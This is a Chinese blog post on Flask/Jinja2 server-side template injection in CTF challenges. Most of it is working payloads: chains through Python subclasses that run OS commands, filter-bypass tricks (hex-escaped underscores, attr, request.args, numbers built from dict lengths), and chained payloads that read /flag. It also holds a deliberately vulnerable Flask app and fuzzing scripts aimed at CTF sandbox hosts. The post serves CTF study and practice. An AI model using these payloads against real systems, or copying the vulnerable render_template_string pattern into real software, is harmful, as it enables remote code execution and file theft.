对CTF中flask SSTI的研究

已于 2022-10-14 12:00:30 修改
阅读量480 收藏 5
点赞数
分类专栏: 杂项 文章标签: flask python 后端
于 2022-10-14 10:35:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46266956/article/details/127315645
版权

过滤字符和关键字:

filter_str = string.printable[62:][:-5]
filter_key = ['class','base','mro','subclasses','globals','builtins','init','flag','cat','ls','env','os','eval','popen','system','attr','read','dict','join','getitem','count']

可利用的类:

1.warnings.catch_warnings
2.WarningMessage
3.codecs.IncrementalEncoder
4.codecs.IncrementalDecoder
5.codecs.StreamReaderWriter
6.os._wrap_close
7.reprlib.Repr
8.weakref.finalize

9._frozen_importlib.BuiltinImporter


1.catch_warnings
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"]["eval"]('__import__("os").popen("ls").read()')

2.WarningMessage
''.__class__.__base__.__subclasses__()[150].__init__.__globals__["__builtins__"]["eval"]("__import__('os').popen('ls')")

7.Repr
''.__class__.__base__.__subclasses__()[180].__init__.__globals__["__builtins__"]["eval"]("__import__('os').popen('calc')")

9.BuiltinImporter
{{[].__class__.__base__.__subclasses__()[69]["load_module"]("os")["popen"]("ls /").read()}}

bypass:

attr() join request.args request.cookie 

1.绕过.[].__class__ == []["__class__"]
[].__class__ == []|attr("__class__")

2.绕过_号
[].__class__ == []["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]
[].__class__ == []|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")
[].__class__ == {% set a=(()|select|string|list).pop(24)%}{{[][a~a~"class"~a~a]}}
[].__class__ == {% set a=(()|select|string|list).pop(24)%}{{[][(a,a,"class",a,a)|join]}}

3.绕过[]
[].__class__.__bases__[0] == ''.__class__.__bases__.__getitem__(0)

4.绕过{{}}
{{}} == {%  %}

5.绕过" '
[].__class__ == {{[][request.args.a]}}&a=__class__
[].__class__ == {{[][request.cookie.a]}} cookie

6.绕过数字
{{dict(asd=a)|join|count}}



组合拳:https://www.cnblogs.com/zpchcbd/p/15881573.html
1.
/?name=
{% set a=(()|select|string|list).pop(24) %}
{% set globals=(a,a,dict(globals=1)|join,a,a)|join %}
{% set init=(a,a,dict(init=1)|join,a,a)|join %}
{% set builtins=(a,a,dict(builtins=1)|join,a,a)|join %}
{% set a=(lipsum|attr(globals)).get(builtins) %}
{% set chr=a.chr %}
{% print a.open(chr(47)~chr(102)~chr(108)~chr(97)~chr(103)).read() %}

2.
?name=
{% set aaaa=dict(a=a,b=b,c=c,d=d,e=e)|length %}
{% set bbbb=dict(a=a)|length %}
{% set cccc=aaaa*aaaa-bbbb %}
{% set dddd=dict(a=a,b=b,c=c,d=d,e=e,f=f,g=g,h=h)|length %}
{% set eeee=dict(a=a,b=b,c=c,d=d,e=e,f=f)|length %}
{% set ffff=dict(a=a,b=b)|length %}
{% set gggg=dict(a=a,b=b,c=c,d=d,e=e,f=f,g=g)|length %}
{% set hhhh=dict(a=a,b=b,c=c,d=d,e=e)|length %}
{% set iiii=dict(a=a,b=b,c=c,d=d)|length %}
{% set a=(()|select|string|list).pop(iiii*eeee) %}
{% set globals=(a,a,dict(globals=bbbb)|join,a,a)|join %}
{% set init=(a,a,dict(init=bbbb)|join,a,a)|join %}
{% set builtins=(a,a,dict(builtins=bbbb)|join,a,a)|join %}
{% set a=(lipsum|attr(globals)).get(builtins) %}
{% set chr=a.chr %}
{% print a.open(chr(dddd*eeee-bbbb)~chr(iiii*iiii*iiii*ffff-dddd-dddd-iiii-eeee)~chr(iiii*iiii*iiii*ffff-dddd-dddd-iiii)~chr(iiii*iiii*iiii*ffff-dddd-dddd-iiii-eeee-hhhh)~chr(iiii*iiii*iiii*ffff-dddd-dddd-iiii-hhhh)).read() %}

python_flask.py

from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/')
def index():
    args = request.args.get('name')
    if args:
        string = '{}'.format(args)
        return render_template_string(string)
    else:
        return 'get param name'
app.run(host='127.0.0.1',port=5003,debug=True)

get_index.py

import requests
import html
# url = 'http://127.0.0.1:5003/?name='
# url = 'http://61.147.171.105:64976/'
# url = 'http://challenge-2d2930898bd378ee.sandbox.ctfhub.com:10800/'

# used = ['_wrap_close','catch_warnings','FileLoader','WarningMessage','IncrementalEncoder','IncrementalDecoder','StreamReaderWriter','Repr','finalize']
'''

catch_warnings
''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')



warnings.catch_warnings
WarningMessage
codecs.IncrementalEncoder
codecs.IncrementalDecoder
codecs.StreamReaderWriter
os._wrap_close
reprlib.Repr
weakref.finalize
'''
class Fuzz:
    def __init__(self):
        self.url = 'http://challenge-9685b2793c26a9b7.sandbox.ctfhub.com:10800/'
        self.param = 'nickname'
        #利用字符
        self.payload = r'[]["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f"][0]["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()'
        self.method = 'post'

        self.length = 611
        self.used_func = ['_wrap_close','catch_warnings','FileLoader','WarningMessage','IncrementalEncoder','IncrementalDecoder','StreamReaderWriter','Repr','finalize']

    def get_length(self):
        injection = '{{'+self.payload+r'["\x5f\x5f\x6c\x65\x6e\x5f\x5f"]()}}'
        if self.method == 'get':
            last_url = self.url+"?"+self.param+"="+injection
            res = requests.get(url=last_url).text
            print(res)
        if self.method == 'post':
            data = {self.param:injection}
            res = requests.post(url=self.url,data=data).text
            print(res)

    def get_allClass(self):
        for i in range(self.length):
            injection = '{{' + self.payload + '[' + str(i) + r']["\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f"]}}'
            if self.method == 'get':
                    last_url = self.url + "?" + self.param + "=" + injection
                    res = requests.get(url=last_url).text
                    res = html.unescape(res)
                    print(i,res)
            if self.method == 'post':
                    data = {self.param: injection}
                    res = requests.post(url=self.url, data=data).text
                    res = html.unescape(res)
                    print(i,res)

    def get_usedFuncIndex(self):
        for i in range(self.length):
            injection = '{{'+self.payload+'['+str(i)+r']["\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f"]}}'
            if self.method == 'get':
                    last_url = self.url + "?" + self.param + "=" + injection
                    res = requests.get(url=last_url).text
                    res = html.unescape(res)
                    for j in self.used_func:
                        if j in res:
                            print(i,j)

            if self.method == 'post':
                    data = {self.param: injection}
                    res = requests.post(url=self.url, data=data).text
                    res = html.unescape(res)
                    for j in self.used_func:
                        if j in res:
                            print(i,j)

f = Fuzz()
f.get_usedFuncIndex()

get_filter.py

import requests
import string
import html

class Fuzz:
    def __init__(self):
        # self.url = 'http://challenge-2d2930898bd378ee.sandbox.ctfhub.com:10800/'
        self.url = 'http://127.0.0.1:5000/'
        self.param = 'name'
        self.method = 'get'
        # self.post_data = 'nickname='
        # self.return_data = 'Your nickname contains restricted characters!'
        self.return_data = 'Get Out!Hacker!'


        self.special_str = string.printable[62:][:-5]
        self.filter_key =['class', 'base', 'mro', 'subclasses', 'globals', 'builtins', 'init', 'flag', 'cat', 'ls', 'env','os', 'eval', 'popen', 'system', 'attr', 'read', 'dict', 'join', 'getitem', 'count']
    def get_filter(self):
        # [print(i,x,ord(x)) for i,x in zip(range(len(self.special_str)),self.special_str)]
        if self.method == 'post':
            for i in self.special_str:
                injection = {self.param:i}
                res = requests.post(url=self.url,data=injection).text
                # print(res)
                # print(html.unescape(res))
                if self.return_data in res:
                    print('NO -- ',i)
            for i in self.filter_key:
                injection = {self.param:i}
                res = requests.post(url=self.url,cookies=injection).text
                if self.return_data in res:
                    print('NO -- ',i)
        if self.method == 'get':
            for i in self.special_str:
                injection = i
                res = requests.get(url=self.url+'?'+self.param+'='+injection).text
                # print(res)
                # print(html.unescape(res))
                if self.return_data in res:
                    print('NO -- ',i)
            for i in self.filter_key:
                injection = i
                res = requests.get(url=self.url + '?' + self.param + '=' + injection).text
                # print(res)
                if self.return_data in res:
                    print('NO -- ',i)

fuzz = Fuzz()
fuzz.get_filter()
Jerem1ah
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3258
0x01 前言 最近在刷题的过程发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
CTF文手册
02-21
CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场的“世界杯”。
new_day2
m0_64348326的博客
06-02 61
它的生成规则是,获取用户名然后拼接-,再拼接一段8位随机数,最后加上.和我们传入的type参数文件名后缀。我们要生成session文件,那么肯定是不能有后缀的,所以到下面则有一个str_replace替换,它会将两个…也就是说,我们上传的文件导出时,它其实是会和session存放在同一个目录的。4.也就是说,当我们传入的file是ARGV时,它是作为数组参数传入的,使程序变成像命令行一样等待我们传值进去。1.看后缀是perl写的,进入到上传页面,我们上传的文件它会原样输出到页面
CTF赛题分析之 Flask 目录穿越
最新发布
baimao__Ch的博客
04-25 604
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
CTFHub Web真题(7星)
qq_43936524的博客
05-20 679
文章目录七星难度SQL注入-2(字符布尔盲注)namp(nmap命令注入)shrine(Jinja SSTI)Web1(sql注入过滤)easy_login(nodejs JWT攻击) 七星难度 SQL注入-2(字符布尔盲注) fuzz admin字段发现会有两种结果账号不存在,和账号和密码错误 测试payload分别为admin' and 1=1 and 'tt'='tt和admin' and 1=2 and 'tt'='tt 猜测为'字符截断的字符型布尔盲注。 sqlmap语句 python sqlma
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
qq_64201116的博客
07-04 2149
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
flask学习三(post请求)
weixin_44371927的博客
03-03 1万+
一,flask构造post请求,参数是form格式 示例代码如下: # coding:utf-8 from flask import Flask from flask import jsonify from flask import request # 创建对象 app = Flask(__name__) users_list = {"1001":["123","张三",19], "1002":["234","李四",22], "1003":["345","王二小",8
flask 获取GET和POST请求参数(全)
热门推荐
ling620的专栏
07-24 6万+
1、简要说明 近日,在使用flask框架获取前端的请求时获取参数时,遇到了几个问题;之前的项目也有使用这部分,当时程序没有问题就没再深究,直到遇到了问题。果然,遇到问题才会成长!^_^ 因此,对GET和POST两种请求方式的参数获取方式进行梳理。 request对象是从客户端向服务器发出请求,包括用户提交的信息以及客户端的一些信息。客户端可通过HTML表单或在网页地址后面提供参数的方法提交数据,然后通过request对象的相关方法来获取这些数据。 request请求总体分为两类: get请求 GET把参
ctfshow web入门-SSTI
LYJ20010728的博客
09-09 1391
ctfshow web入门-SSTIweb361题目描述解题思路web362题目描述解题思路web363题目描述解题思路web364题目描述解题思路web365题目描述解题思路web366题目描述解题思路web367题目描述解题思路web368题目描述解题思路web369题目描述解题思路web370题目描述解题思路web371题目描述解题思路web372题目描述解题思路trick web361 题目描述 名字就是考点 解题思路 直接读取 FLAG 即可,这里利用的是 os._wrap_close
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5716
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
ctf杂项解题常用的exe软件
05-18
你也许可以下载到,也许你下载不到,都可以来找我哟!!!感谢你的赞助!!!
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
CTF比赛的常见题型
11-13
CTF比赛的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)文一般译作夺旗赛,在网络安全领域指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
CTFAWD的waf 用于防止别人读取flag
10-08
CTFAWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
CTF常见的编码和加密总结
09-07
加解密和编码解码是CTF最常见的一类题,文档总结了一些常见的编码和加密方法,希望能给大家一个参考。
CTFWeb各种题目的解题姿势
05-25
Web题型是CTF常考题型之一,它将实际渗透过程的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2178
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url有个name=article,这个参数,猜测这个参数是突破点,将article.
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1124
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
buu ctf web进阶]ssti
08-23
在buu ctf web进阶ssti代表 Side Template Injection,是一种应用程序的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jerem1ah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值